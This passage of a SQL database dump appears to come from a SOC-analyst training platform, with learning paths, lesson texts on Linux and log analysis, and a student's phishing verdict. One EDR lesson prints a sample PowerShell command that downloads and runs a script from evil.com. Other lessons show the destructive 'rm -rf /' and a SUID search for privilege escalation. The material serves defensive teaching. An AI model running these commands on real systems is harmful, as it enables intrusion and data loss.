'{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-16 06:17:29', '2026-03-16 03:07:29', '2026-03-16 03:19:00', 0, NULL),
(607, 225, 303, 'submitted', NULL, NULL, '{\"verdict\":\"True Positive\",\"executive_summary\":\"The sender\'s email has a typo. The spelling is \\\"trusfed\\\" instead of \\\"trusted\\\". That misspelling is already highly suspicious. The URL is using port 80 (HTTP) which is not secured. This indicates that the attacker is stealing user credentials. Therefore, this email is a phishing email.\",\"artifacts\":\"198.51.100.23, 192.168.1.45, http://malicious-link.example.com, admin@trusfed-business.com, asmith, email-server\",\"analysis_answers\":{\"action_taken\":\"The sender\'s email has a typo. The spelling is \\\"trusfed\\\" instead of \\\"trusted\\\". That misspelling is already highly suspicious. The URL is using port 80 (HTTP) which is not secured. This indicates that the attacker is stealing user credentials. Therefore, this email is a phishing email.\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-16T03:27:16.741Z\"}', NULL, '2026-03-16 06:29:06', '2026-03-16 03:19:06', '2026-03-16 03:27:16', 0, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `investigation_notes`
--

CREATE TABLE `investigation_notes` (
  `id` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,
  `alert_id` int(11) NOT NULL,
  `note` text NOT NULL,
  `created_at` timestamp NULL DEFAULT current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `learning_paths`
--

CREATE TABLE `learning_paths` (
  `id` int(11) NOT NULL,
  `title` varchar(255) NOT NULL,
  `description` text DEFAULT NULL,
  `difficulty_level` enum('beginner','intermediate','advanced') NOT NULL,
  `estimated_hours` int(11) DEFAULT 0,
  `icon_url` varchar(255) DEFAULT NULL,
  `display_order` int(11) DEFAULT 0,
  `is_active` tinyint(1) DEFAULT 1,
  `created_at` timestamp NULL DEFAULT current_timestamp(),
  `updated_at` timestamp NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `prerequisite_path_id` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `learning_paths`
--

INSERT INTO `learning_paths` (`id`, `title`, `description`, `difficulty_level`, `estimated_hours`, `icon_url`, `display_order`, `is_active`, `created_at`, `updated_at`, `prerequisite_path_id`) VALUES
(1, 'Pre-Security Fundamentals', 'Start your cybersecurity journey with essential IT and security foundations. Perfect for absolute beginners.', 'beginner', 120, NULL, 1, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(2, 'Security Operations Basics', 'Build practical security operations skills with hands-on log analysis, packet inspection, and threat detection.', 'intermediate', 180, NULL, 2, 1, '2025-12-26 02:43:16', '2025-12-26 15:49:18', NULL),
(3, 'SOC Analyst Level 1', 'Master SIEM platforms, incident response, and become job-ready for SOC Analyst roles.', 'intermediate', 220, NULL, 3, 1, '2025-12-26 02:43:16', '2025-12-26 15:49:18', NULL),
(4, 'Advanced SOC & Threat Hunting', 'Advanced threat hunting, malware analysis, and specialized security operations.', 'advanced', 160, NULL, 4, 1, '2025-12-26 02:43:16', '2025-12-26 15:49:18', NULL),
(6, 'Threat Intelligence', 'Master the art of Cyber Threat Intelligence (CTI). Learn to collect, analyze, and disseminate intelligence to anticipate and prevent attacks.', 'intermediate', 40, NULL, 6, 1, '2025-12-29 13:30:44', '2025-12-29 13:30:44', NULL),
(9, 'Alert Investigation Specialist', 'Master the art of investigating specific security alerts. Deep dive into EDR, SIEM, Network, and Email analysis tools.', 'beginner', 0, NULL, 3, 1, '2025-12-26 17:59:30', '2025-12-26 17:59:30', NULL),
(11, 'Digital Forensics & Incident Response (DFIR)', 'Master the art of responding to cyber attacks. Learn digital forensics, memory analysis, and the incident response lifecycle.', 'intermediate', 60, NULL, 5, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(12, 'Network Security & Traffic Analysis', 'Master the foundational protocols of the internet and learn how to analyze network traffic to detect and stop cyber attacks.', 'intermediate', 50, NULL, 6, 1, '2026-03-09 22:28:55', '2026-03-09 22:28:55', NULL);

-- --------------------------------------------------------

--
-- Table structure for table `lesson_content`
--

CREATE TABLE `lesson_content` (
  `id` int(11) NOT NULL,
  `task_id` int(11) NOT NULL,
  `content` text NOT NULL,
  `content_type` enum('markdown','html') DEFAULT 'markdown',
  `reading_time_minutes` int(11) DEFAULT NULL,
  `created_at` timestamp NULL DEFAULT current_timestamp(),
  `updated_at` timestamp NULL DEFAULT current_timestamp() ON UPDATE current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `lesson_content`
--

INSERT INTO `lesson_content` (`id`, `task_id`, `content`, `content_type`, `reading_time_minutes`, `created_at`, `updated_at`) VALUES
(1, 1, '## What is Cybersecurity?\n\n**Cybersecurity** is the practice of protecting systems, networks, and programs from digital attacks. These cyberattacks are usually aimed at accessing, changing, or destroying sensitive information; extorting money from users; or interrupting normal business processes.\n\n---\n\n### The Evolution of Hacking\nTo understand where we are, we must look at where we came from.\n\n#### 1. The Era of Phreaking (1970s)\nBefore computers were networked, hackers targeted **phones**. \"Phreakers\" like John Draper (Captain Crunch) used a toy whistle that emitted a 2600Hz tone. This tone tricked the AT&T phone switches into giving free long-distance calls.\n*   **Motivation**: Curiosity.\n\n#### 2. The Morris Worm (1988)\nRobert Morris wrote a script to gauge the size of the internet. A coding error made it propagate uncontrollably. It crashed 10% of the entire internet.\n*   **Impact**: The first conviction under the Computer Fraud and Abuse Act.\n\n#### 3. The Script Kiddie Era (1990s-2000s)\nTools became public. You didn\'t need to know C code; you just needed to download \"Sub7\" or \"Back Orifice\". Defacements of websites were common.\n*   **Motivation**: Fame / Notoriety.\n\n#### 4. The Era of Cybercrime (2010s-Present)\nHacking became a business. Organized crime groups (like Conti, LockBit) run \"Ransomware as a Service\". They have HR departments, helpdesks, and payroll.\n*   **Motivation**: Money. Trillions of dollars lost annually.\n\n#### 5. Cyber Warfare (State Sponsored)\nNations (US, China, Russia, Israel, Iran) use cyber tools for espionage and sabotage.\n*   **Stuxnet (2010)**: A worm that physically destroyed Iranian nuclear centrifuges. The first \"digital weapon\".\n\n---\n\n### Why is Cybersecurity Hard?\n1.  **The Defender\'s Dilemma**: A defender must be right 100% of the time. An attacker only needs to be right ONCE.\n2.  **Complexity**: Modern software has millions of lines of code. Bugs are inevitable.\n3.  **The Human Factor**: You can have a $1 Million Firewall, but if Dave in Accounting clicks a link that says \"Free iPhone\", you are breached.\n\n### Key Terminology\n*   **Threat**: The potential cause of an unwanted incident (e.g., A hacker, a hurricane).\n*   **Vulnerability**: A weakness in a system (e.g., Weak password, unpatched Windows).\n*   **Risk**: The likelihood of a Threat exploiting a Vulnerability. (`Risk = Threat x Vulnerability`).', 'markdown', 3, '2025-12-26 01:08:19', '2025-12-29 13:58:57'),
(2, 2, '## Threats, Vulnerabilities, and Exploits\n\nThe \"Holy Trinity\" of InfoSec. You must master these definitions.\n\n### 1. Vulnerability (The Lock is Broken)\nA flaw or weakness in system security procedures, design, implementation, or internal controls.\n*   **Software Vulns**: SQL Injection, Buffer Overflow.\n*   **Hardware Vulns**: Meltdown/Spectre (CPU flaws).\n*   **Human Vulns**: Gullibility (Phishing), Laziness (Weak passwords).\n*   **CVE (Common Vulnerabilities and Exposures)**: The global ID system for vulns. e.g., `CVE-2021-44228` (Log4j).\n\n### 2. Threat (The Thief)\nAny circumstance or event with the potential to adversely impact operations.\n*   **Adversarial Threats**: Hackers, Nation States, Insiders.\n*   **Environmental Threats**: Floods, Earthquakes, Power Failure.\n*   **Accidental Threats**: Users deleting the wrong database.\n\n### 3. Exploit (The Key)\nCode or a technique that takes advantage of a vulnerability.\n*   **Zero-Day Exploit**: An exploit for a vulnerability that the vendor (e.g., Microsoft) does **not** know about yet. There is no patch. These are worth millions on the black market.\n*   **Public Exploit**: Code available on Exploit-DB or GitHub.\n\n---\n\n### The Equation of Risk\n> **Risk = Threat × Vulnerability × Impact**\n\n*   **Scenario A**:\n    *   Threat: High (Nation State).\n    *   Vuln: High (Unpatched Server).\n    *   Impact: High (Database with all customer SSNs).\n    *   **Result**: CRITICAL RISK.\n\n*   **Scenario B**:\n    *   Threat: High.\n    *   Vuln: High.\n    *   Impact: Low (The server hosts the cafeteria menu).\n    *   **Result**: LOW RISK.\n\n**Risk Management** is about lowering one of these variables.\n*   We can\'t lower the **Threat** (Hackers exist).\n*   We can lower the **Vuln** (Patching).\n*   We can lower the **Impact** (Network Segmentation, Backups).', 'markdown', 3, '2025-12-26 01:08:19', '2025-12-29 13:58:57'),
(3, 3, '## Careers in Cybersecurity\n\nThe field is massive. It is not just \"Hacking\".\n\n### 1. The Blue Team (Defenders)\nThey build, monitor, and defend. 80% of jobs are here.\n*   **SOC Analyst (Tier 1/2/3)**: The first line of defense. Monitors logs, triages alerts. \"The Firefighter\".\n*   **Security Engineer**: Builds the tools. Configures Firewalls (Palo Alto), SIEMs (Splunk), and EDRs (CrowdStrike).\n*   **Incident Responder (IR)**: The SWAT team. Called in when a breach is confirmed to kick the attacker out.\n*   **Threat Hunter**: Proactively searches for threats that evaded the SOC.\n\n### 2. The Red Team (Offense)\nAuthorized hackers who test defenses.\n*   **Penetration Tester**: Hired to break into a specific app or network to find bugs.\n*   **Red Teamer**: Simulation of a full adversary (APT). They might phish employees, clone badges, or break windows.\n\n### 3. Engineering & GRC\n*   **DevSecOps**: Writes secure code and builds security into the pipeline.\n*   **GRC (Governance, Risk, Compliance)**: Policy writers. Auditors. They ensure the company follows laws (GDPR, HIPAA) and standards (ISO 27001). \"The Lawyers of Cyber\".\n\n---\n\n### Certificates vs Degrees\nCybersecurity is a meritocracy. Practical skills often outweigh degrees.\n*   **Entry Level**: CompTIA Security+, Network+.\n*   **Technical**: OSCP (PenTesting), BTL1 (Blue Team), CCNA (Networking).\n*   **Management**: CISSP (The \"Gold Standard\" for HR filters, but less technical).\n\n### How to Start?\n1.  **Learn Linux**: It is the OS of the internet.\n2.  **Learn Networking**: You can\'t hack a network if you don\'t know how IP packets work.\n3.  **Build a Lab**: Set up VirtualBox with Kali Linux and a vulnerable target (Metasploitable).', 'markdown', 3, '2025-12-26 01:52:34', '2025-12-29 13:58:57'),
(4, 4, '\n## 🎯 Learning Objective\n\nUnderstand **Quiz: Cybersecurity Basics** and its role in modern cybersecurity operations.\n\n---\n\n## 📖 Core Concept\n\nQuiz: Cybersecurity Basics is a foundational element of security.\n\n### What is it?\nQuiz: Cybersecurity Basics involves:\n- **Identification**: Recognizing patterns\n- **Analysis**: Understanding impact\n- **Mitigation**: Reducing risk\n\n### Why it Matters\nWithout Quiz: Cybersecurity Basics, organizations cannot effectively defend against threats.\n\n---\n\n## ⚡ Quick Facts\n\n- **Criticality**: High\n- **Frequency**: Daily\n- **Impact**: Operational Security\n\n---\n\n## 🛠️ Analyst Workflow\n\n1. **Monitor**: Watch for indicators\n2. **Analyze**: Verify context\n3. **Escalate**: If confirmed threat\n\n---\n\n## 📝 Summary\n\nMastering **Quiz: Cybersecurity Basics** is essential for Level 1 SOC analysts.\n', 'markdown', 3, '2025-12-26 01:52:34', '2025-12-26 14:39:59'),
(5, 5, '## Setting Up Your Lab\n\nYou cannot learn hacking by reading. You must **do**.\nA Home Lab is safe place to break things.\n\n### The Virtualization Hypervisor\nAllows you to run multiple Operating Systems on one physical computer.\n*   **VirtualBox**: Free, Open Source. (Recommended).\n*   **VMware Workstation Player**: Free for personal use. fast.\n\n### The Attack Box: Kali Linux\nA Debian-based Linux distribution pre-installed with 600+ hacking tools.\n*   **Nmap**: Scanner.\n*   **Metasploit**: Exploit Framework.\n*   **Wireshark**: Packet Sniffer.\n*   **Burp Suite**: Web Proxy.\n*   *Download*: Get the \"VirtualBox Image\" from kali.org. Do not install the ISO unless you are comfortable.\n\n### The Victim Box: Metasploitable 2\nAn intentionally vulnerable Linux machine.\n*   It has open ports, weak passwords, and old web apps.\n*   **WARNING**: Never expose Metasploitable to the internet (Bridge Mode). Always use \"Host Only\" or \"NAT Network\" mode in VirtualBox. If you expose it, **you will be hacked**.\n\n### Network Modes\n1.  **NAT**: VM creates a private network inside the host. Can access internet. Safe.\n2.  **Bridged**: VM gets an IP from your home Router. It sits next to your laptop. Risky for vulnerable VMs.\n3.  **Host-Only**: Isolated network. VM can only talk to Host and other VMs. Most Secure.\n\n### Lab Exercise\n1.  Install VirtualBox.\n2.  Import Kali Linux.\n3.  Import Metasploitable.\n4.  Set both to \"NAT Network\".\n5.  Ping Metasploitable from Kali.', 'markdown', 3, '2025-12-26 01:52:35', '2025-12-29 13:58:57'),
(6, 6, '## Linux Navigation\n\nLinux powers 90% of the internet\'s servers, 100% of supercomputers, and most hacking tools. If you can\'t use the terminal, you can\'t do cyber.\n\n### The File System Hierarchy\nLinux does not have `C:`. It starts at Root `/`.\n*   `/` **(Root)**: The base.\n*   `/home`: User directories. (e.g., `/home/baris`). Equivalent to `C:Users`.\n*   `/etc`: Configuration files. (e.g., `/etc/passwd`).\n*   `/var`: Variable data (Logs live in `/var/log`).\n*   `/bin`: Binaries (Programs) like `ls`, `cat`.\n*   `/tmp`: Temporary files. Cleared on reboot.\n\n### Basic Commands\n1.  `pwd` (**Print Working Directory**): Where am I?\n    *   Output: `/home/kali`\n2.  `ls` (**List**): Show files.\n    *   `ls -l`: Long listing (Permissions, Size, Owner).\n    *   `ls -a`: All files (Including hidden files starting with `.`).\n    *   `ls -la`: Hidden + Long. (Muscle memory).\n3.  `cd` (**Change Directory**): Move.\n    *   `cd Downloads`: Go to Downloads.\n    *   `cd ..`: Go up one level.\n    *   `cd ~`: Go home.\n    *   `cd /`: Go to root.\n\n### Absolute vs Relative Paths\n*   **Absolute**: Full address. Always works.\n    *   `cd /var/log/apache2`\n*   **Relative**: Relative to where you are.\n    *   If you are in `/var`, you can type `cd log`.\n\n### Exercise\nOpen your terminal.\n1.  Type `pwd`.\n2.  Type `cd /etc`.\n3.  Type `ls`. Look for `passwd`.\n4.  Type `cd ..` to go back to root.', 'markdown', 3, '2025-12-26 02:06:45', '2025-12-29 13:58:57'),
(7, 7, '## Touching Files\n\nCreating, Moving, and Destroying files.\n\n### Creating\n1.  `touch file.txt`: Creates an empty file.\n2.  `mkdir foldername`: Creates a directory (Make Directory).\n3.  `echo \"Hello\" > file.txt`: Creates a file containing \"Hello\".\n\n### Reading\n1.  `cat file.txt`: Dumps the whole file to screen. Good for small files.\n2.  `less file.txt`: Opens a paginated viewer. Scroll with arrows. Quit with `q`. Good for huge logs.\n3.  `head file.txt`: Shows first 10 lines.\n4.  `tail file.txt`: Shows last 10 lines.\n    *   `tail -f /var/log/syslog`: **Follow**. Shows new lines as they are written in real-time. Crucial for debugging.\n\n### Moving & Renaming\nLinux uses `mv` for both.\n*   **Move**: `mv file.txt /tmp/` (Moves file to tmp).\n*   **Rename**: `mv file.txt newname.txt` (Moves file to same place with new name).\n\n### Copying\n*   `cp file.txt file_backup.txt`\n*   `cp -r folder/ folder_backup/` (Recursive copy for directories).\n\n### Deleting (The Dangerous Part)\n*   `rm file.txt`: Remove file. **There is no Recycle Bin**. It is gone.\n*   `rm -r folder/`: Remove directory.\n*   `rm -rf /`: **The Forbidden Command**. Recursively Force remove Root. Deletes the entire OS. Do not run this.\n\n### Hidden Files\nIn Linux, any file starting with `.` is hidden.\n*   `.bashrc`: Your shell configuration.\n*   `.ssh/`: Your keys.\nYou must use `ls -a` to see them.', 'markdown', 3, '2025-12-26 02:06:45', '2025-12-29 13:58:57'),
(8, 8, '## Linux Permissions\n\nLinux is a multi-user OS. Permissions decide who can Read, Write, or Execute.\n\n### The Output of `ls -l`\nExample: `-rwxr-xr-- 1 owner group size date file`\n\nThe first part `rwxr-xr--` tells the story.\nIt is split into 3 groups of 3 characters:\n1.  **User (Owner)**: `rwx` (Read, Write, Execute).\n2.  **Group**: `r-x` (Read, Execute. No Write).\n3.  **Others (World)**: `r--` (Read only).\n\n### The Modes\n*   **r (Read)**:\n    *   File: View contents.\n    *   Dir: List contents (`ls`).\n*   **w (Write)**:\n    *   File: Modify/Delete content.\n    *   Dir: Create/Delete files inside it.\n*   **x (Execute)**:\n    *   File: Run as a program/script.\n    *   Dir: Enter the directory (`cd`).\n\n### Changing Permissions (`chmod`)\nYou can use numbers (Octal) or letters.\n\n**The Numbers**:\n*   Read = 4\n*   Write = 2\n*   Execute = 1\n*   Total = 7\n\n**Common Sets**:\n*   `chmod 777 file`: Everyone can do everything. **Insecure**.\n*   `chmod 700 file`: Only I (User) can read/write/run. Private keys usually need this.\n*   `chmod 755 file`: I can do all. Everyone else can Read/Run. (Standard for scripts).\n*   `chmod +x file`: Quick way to make a script executable.\n\n### Changing Owner (`chown`)\n*   `chown user:group file`\n*   `chown root:root /etc/shadow`', 'markdown', 3, '2025-12-26 02:06:45', '2025-12-29 13:58:57'),
(9, 9, '## Finding Files\n\nYou hacked a server. You want to find \"passwords.txt\". How?\n\n### 1. `locate`\nThe fast, indexed search.\n*   `locate password.txt`\n*   **Pros**: Instant.\n*   **Cons**: Relies on a database (`updatedb`). If the file was made 1 minute ago, locate won\'t find it.\n\n### 2. `find`\nThe powerful, real-time crawler.\n*   Syntax: `find [where] [filters] [action]`\n\n**Examples**:\n*   `find / -name \"flag.txt\"`: Search whole drive for flag.txt.\n*   `find /home -name \"*.conf\"`: Search home for configs.\n*   `find / -type f -size +100M`: Find files larger than 100MB.\n*   `find / -perm -4000 2>/dev/null`: Find SUID files (Privilege Escalation gold).\n    *   `2>/dev/null` hides \"Permission Denied\" errors so you only see clean results.\n\n### 3. `which`\nFinds executable binaries in your PATH.\n*   `which python`: Shows `/usr/bin/python`.\n*   If `which` returns nothing, the tool is not installed or not in PATH.', 'markdown', 3, '2025-12-26 02:06:45', '2025-12-29 13:58:57'),
(10, 10, '## Grep (Global Regular Expression Print)\n\nGrep is the search tool for **content**. It finds text *inside* files.\n\n### Basic Usage\n*   `grep \"error\" /var/log/syslog`: Show me lines containing \"error\".\n*   `grep -i \"pass\" file.txt`: Case insensitive (finds \"Pass\", \"PASS\").\n*   `grep -r \"apikey\" /var/www/html/`: **Recursive**. Search every file in the website folder for \"apikey\".\n\n### Pipes (`|`)\nThe pipe takes the output of the Left command and feeds it to the Right command. It is the most powerful feature of Linux.\n\n*   `cat huge_log.txt | grep \"IP: 1.2.3.4\"`\n    *   1. Cat dumps the file.\n    *   2. Pipe catches it.\n    *   3. Grep filters it.\n*   `ls -la | grep \"Aug\"`: Show files modified in August.\n*   `history | grep \"ssh\"`: Search my command history for SSH connections.\n\n### Real World Scenario: Log Analysis\nYou are investigating a web server access log.\n1.  `cat access.log | grep \"404\"` (Find failures).\n2.  `cat access.log | grep \"admin.php\"` (Find attempts to access admin).\n3.  `cat access.log | awk \'{print $1}\' | sort | uniq -c | sort -nr`: (Count requests by IP address. The \"freq\" command stack).', 'markdown', 3, '2025-12-26 02:18:44', '2025-12-29 13:58:57'),
(11, 11, '## Process Management\n\nEvery program running is a **Process**. Each has a unique **PID** (Process ID).\n\n### Viewing Processes\n1.  `ps`: List my processes.\n2.  `ps aux`: List **ALL** processes from all users.\n    *   **a**: All users.\n    *   **u**: User/owner column.\n    *   **x**: Processes not attached to a terminal (Daemons).\n3.  `top`: Real-time task manager (CPU/RAM usage).\n    *   Press `q` to quit.\n\n### Killing Processes\nSometimes a program crashes or you need to stop a malicious script.\n*   `kill [PID]`\n    *   Example: `kill 1234` (Polite kill request. SIGTERM).\n*   `kill -9 [PID]`\n    *   **Force Kill**. (SIGKILL). The nuclear option. The kernel rips the process out of memory.\n\n### Backgrounding\n*   **Foreground**: `ping google.com` -> Takes over your terminal.\n*   **Background**: `ping google.com &` -> Runs in background. Terminal is free.\n*   **Ctrl+Z**: Pauses current process.\n*   `bg`: Resumes paused process in background.\n*   `fg`: Brings background process to foreground.\n\n### Services (`systemctl`)\nDaemons that start at boot (like Apace/Nginx).\n*   `systemctl status apache2`\n*   `systemctl start apache2`\n*   `systemctl stop apache2`\n*   `systemctl enable apache2` (Start on boot).', 'markdown', 3, '2025-12-26 02:18:44', '2025-12-29 13:58:57'),
(12, 12, '## Package Management\n\nInstalling software in Linux. We don\'t google \"download .exe\". We use Repositories (App Stores).\n\n### APT (Debian/Ubuntu/Kali)\n**Advanced Package Tool**.\n1.  `apt update`: Refreshes the list of available software. (Does NOT install updates).\n    *   *Analogy*: Checking the catalogue to see what is new.\n2.  `apt upgrade`: Actually installs the newer versions of installed packages.\n3.  `apt install [package]`: Installs a tool.\n    *   `apt install nmap`\n    *   `apt install python3`\n4.  `apt remove [package]`: Uninstalls.\n\n### Repositories\nYour OS looks in `/etc/apt/sources.list`.\nIf you try to install \"tool_xyz\" and it says \"Unable to locate package\", your sources.list might be missing the repository that contains it.\n\n### Other Managers\n*   **YUM / DNF**: Used by Red Hat / CentOS / Fedora.\n    *   `dnf install httpd`\n*   **Pacman**: Used by Arch Linux.\n    *   `pacman -S firefox`\n*   **Snap**: Universal packages.\n    *   `snap install discord`\n\n### Compile from Source (Github)\nSometimes a tool isn\'t in Apt. You must build it.\n1.  `git clone https://github.com/user/tool.git`\n2.  `cd tool`\n3.  Look for `README.md`!\n4.  Usually: `./configure`, `make`, `make install` OR `pip install -r requirements.txt` (Python).', 'markdown', 3, '2025-12-26 02:18:44', '2025-12-29 13:58:57'),
(350, 349, '# 🦅 Understanding EDR Telemetry\n\nEndpoint Detection and Response (EDR) tools provide a flight recorder for your endpoints. They capture everything a computer does.\n\n## 📝 The Raw Log\nBelow is a raw JSON log from an EDR agent (e.g., CrowdStrike/SentinelOne style).\n\n```json\n{\n  \"event_type\": \"ProcessRoleup2\",\n  \"timestamp\": \"2024-03-15T10:45:22Z\",\n  \"hostname\": \"FINANCE-PC-01\",\n  \"user_name\": \"CORP\\\\asmith\",\n  \"file_name\": \"powershell.exe\",\n  \"file_path\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\n  \"command_line\": \"powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString(\'http://evil.com/payload.ps1\')\"\",\n  \"parent_process\": \"winword.exe\",\n  \"parent_command_line\": \"\"C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\WINWORD.EXE\" C:\\\\Users\\\\asmith\\\\Downloads\\\\Invoice_UPDATED.docx\",\n  \"sha256\": \"9f9d5187af9e...\"\n}\n```\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: Analyze the Hierarchy (Parent-Child)\n* **Parent**: `winword.exe` (Microsoft Word)\n* **Child**: `powershell.exe`\n* **Analysis**: Word documents should **never** spawn PowerShell. This is a classic sign of a **Malicious Macro**.\n\n### Step 2: Decode the Command Line\n* `-nop`: NoProfile (Hides awareness from user).\n* `-w hidden`: WindowStyle Hidden (User sees nothing).\n* `IEX`: Invoke-Expression (Execute code).\n* `DownloadString`: Fetch code from the internet.\n\n### Step 3: Check the Context\n* **User**: `asmith` (Finance Dept).\n* **Document**: `Invoice_UPDATED.docx`.\n* **Conclusion**: User opened a phishing email with a weaponized invoice.\n', 'markdown', NULL, '2025-12-26 17:59:30', '2025-12-26 18:04:20'),
(351, 350, '# 🌳 Analyzing Process Trees\n\nVisualizing the chain of execution is critical.\n\n## 📝 The Raw Log\nA series of events joined by process ID (PID).\n\n```text\n[TIME: 14:00:01] PID: 1044 | svchost.exe (System Service)\n    └── [TIME: 14:00:05] PID: 2055 | cmd.exe /c \"whoami\"\n        └── [TIME: 14:00:06] PID: 3100 | conhost.exe\n```\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: Identify the Root\n* **Root**: `svchost.exe`. This is a generic Windows service host.\n* **Issue**: `svchost.exe` launching `cmd.exe` is highly suspicious. It usually points to a compromised service (like a vulnerability in SMB or a web server running as system).\n\n### Step 2: Check the Child Activity\n* **Command**: `whoami`.\n* **Context**: This is a \"Discovery\" command. Attackers run it immediately after getting shell access to see who they are (SYSTEM vs User).\n\n### Step 3: The \"Conhost\"\n* `conhost.exe` is normal when `cmd` runs. It handles the console window.\n\n### 🔴 Assessment\nThis looks like a **Reverse Shell** or **Remote Code Execution (RCE)** exploit.\n', 'markdown', NULL, '2025-12-26 17:59:30', '2025-12-26 18:04:20'),
(352, 351, '# 🦀 Detecting Lateral Movement\n\nAfter compromising one machine, attackers move sideways to find the Crown Jewels (Domain Controller).\n\n## 📝 The Raw Log (PsExec Event)\n\n```xml\n<Event xmlns=\'http://schemas.microsoft.com/win/2004/08/events/event\'>\n  <System>\n    <EventID>7045</EventID>\n    <Computer>HR-LAPTOP-04</Computer>\n  </System>\n  <EventData>\n    <Data Name=\'ServiceName\'>PSEXESVC</Data>\n    <Data Name=\'ImagePath\'>%SystemRoot%\\PSEXESVC.exe</Data>\n    <Data Name=\'ServiceType\'>user mode service</Data>\n    <Data Name=\'StartType\'>demand start</Data>\n    <Data Name=\'AccountName\'>LocalSystem</Data>\n  </EventData>\n</Event>\n```\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: Analyze Event 7045\n* **Event 7045**: A new service was installed.\n* **ServiceName**: `PSEXESVC`.\n* **Significance**: This is the default service name for **PsExec**, a tool often used by admins but LOVED by hackers for moving laterally.\n\n### Step 2: Contextualize\n* Did authorized IT staff deploy software at this time?\n* If NO, an attacker effectively \"remote controlled\" this machine from another infected host.\n\n### Step 3: Find the Source\n* Look for successful network logins (Event 4624, Type 3) occurring just before this event to find the **Patient Zero** IP.\n', 'markdown', NULL, '2025-12-26 17:59:30', '2025-12-26 18:04:20'),
(353, 352, '# 💉 Memory Injection Techniques\n\nFileless malware doesn\'t write to disk. It lives in RAM.\n\n## 📝 The Raw Log (Sysmon Event 8)\n\n```json\n{\n  \"event_id\": 8,\n  \"desc\": \"CreateRemoteThread\",\n  \"source_image\": \"C:\\Users\\Bob\\AppData\\Local\\Temp\\malware.exe\",\n  \"target_image\": \"C:\\Windows\\System32\\explorer.exe\",\n  \"target_process_id\": \"4022\",\n  \"start_address\": \"0xDEADBEEF\"\n}\n```\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: The \"Injector\"\n* **Source**: `malware.exe` running from `Temp`.\n* **State**: This is the malicious dropper.\n\n### Step 2: The \"Victim\"\n* **Target**: `explorer.exe`. This is the Windows desktop/file manager. It is *always* running.\n* **Action**: `CreateRemoteThread`. The source is forcing the target to run code.\n\n### Step 3: The Result\n* Once injected, `malware.exe` can delete itself.\n* The malicious code now runs INSIDE `explorer.exe`.\n* **Implication**: You will see `explorer.exe` making network connections to Russia. If you kill `explorer`, you kill the user\'s desktop session.\n\n### 🛡️ Response\nDo not just kill the process. Isolate the host and run memory forensics.\n', 'markdown', NULL, '2025-12-26 17:59:30', '2025-12-26 18:04:20'),
(354, 353, '# 🛑 Isolating Infected Hosts\n\nTime is money. The faster you act, the less damage occurs.\n\n## 📝 The Response Log (Audit Trail)\n\n```json\n{\n  \"action\": \"ResponseAction\",\n  \"type\": \"NetworkContainment\",\n  \"status\": \"Success\",\n  \"target_host\": \"FINANCE-PC-01\",\n  \"initiator\": \"Analyst_Baris\",\n  \"timestamp\": \"2024-03-15T10:55:00Z\",\n  \"policy\": {\n    \"allow_dns\": false,\n    \"allow_edr_cloud\": true,\n    \"allow_all_else\": false\n  }\n}\n```\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: Verification\n* **Action**: `NetworkContainment`.\n* **Policy**: The log confirms that the host can ONLY talk to the EDR cloud (`allow_edr_cloud: true`). This is vital. You don\'t want to lose your own access!\n\n### Step 2: What happens next?\n* The attacker loses their C2 connection.\n* **Active shells die**.\n* **Data exfiltration stops**.\n* The user sees \"No Internet\".\n\n### Step 3: Remediation\n1. **Live Response**: Connect via EDR shell.\n2. **Collect Artifacts**: Get the `Invoice_UPDATED.docx` file.\n3. **Re-image**: Wipe the machine. Better safe than sorry.\n', 'markdown', NULL, '2025-12-26 17:59:30', '2025-12-26 18:04:20'),
(360, 359, '# 🔎 Writing SPL\n\nSearch Processing Language (SPL) is the standard for querying big data in Splunk.\n\n## 📝 The Scenario\nYour boss says \"Find all failed logins from China in the last 24 hours.\"\n\n## 📝 The Raw Query (SPL)\n\n```splunk\nindex=main sourcetype=wineventlog:security EventCode=4625 \n| iplocation SourceNetworkAddress \n| search Country=\"China\"\n| stats count by SourceNetworkAddress, User\n| sort - count\n```\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: Filter Phase\n* `index=main`: Search only the main storage.\n* `EventCode=4625`: Windows Failed Identity.\n\n### Step 2: Enrichment\n* `iplocation`: Splunk automatically adds `Country`, `City`, `Lat`, `Lon` based on the IP address.\n\n### Step 3: Aggregation\n* `stats count by...`: Instead of showing 10,000 individual log lines, show me a table.\n* **Row 1**: IP `1.2.3.4`, User `Admin`, Count `500`.\n* **Conclusion**: We are under a brute force attack.\n', 'markdown', NULL, '2025-12-26 17:59:31', '2025-12-26 18:05:37'),
